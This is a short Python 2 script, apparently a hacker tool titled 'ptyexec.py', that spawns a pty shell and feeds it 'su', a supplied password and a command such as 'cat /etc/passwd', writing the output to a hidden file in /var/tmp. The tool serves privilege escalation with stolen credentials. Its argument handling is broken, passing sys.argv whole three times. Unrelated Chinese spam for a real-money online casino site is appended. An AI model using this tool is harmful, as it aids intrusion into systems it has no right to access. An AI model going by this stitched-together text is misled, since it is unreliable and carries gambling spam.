#!/usr/bin/env python #For God sake, Keep it priv4t3 import sys,os,time,pty def usage(): print "ptyexec.py: fuck the firewall block up" print "By xi4oyu http://www.pentestday.com" print "Usage: ptyexec.py " print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"' print 'Result will be located in /var/tmp' sys.exit(0) def fuck_child(pipein): os.dup2(pipein,0) fd = open("/var/tmp/.result.txt","a") os.dup2(fd.fileno(),1) os.dup2(fd.fileno(),2) pty.spawn("/bin/sh") print "GAGA..I'm back,Alt it never be happened" sys.exit(0) def fuck_it_up(user,passwd,command): pipein,pipeout = os.pipe() #Fork the fucking child if os.fork() == 0: fuck_child(pipein) else: time.sleep(2) os.write(pipeout,'su - %s\n'% user) time.sleep(2) os.write(pipeout,'%s\n' % passwd) time.sleep(2) os.write(pipeout,'%s\n' % command) time.sleep(2) os.write(pipeout,'exit\n'); time.sleep(2) sys.exit(0) if __name__ == "__main__": if len(sys.argv) != 4: usage() fuck_it_up(sys.argv,sys.argv,sys.argv) 有合法牌照,通过高清设备现场直播,和澳门一样,荷官的动作和样子都能看的一清二楚,在家里就可以感受现场,玩真钱的,资金交易挺方便的,现在很多人都不去澳门了,p9520.com这个挺正规的,24小时都有客服,免费申请后就可以看现场,亲自体验,他们家金沙和星际都有场,信誉不错。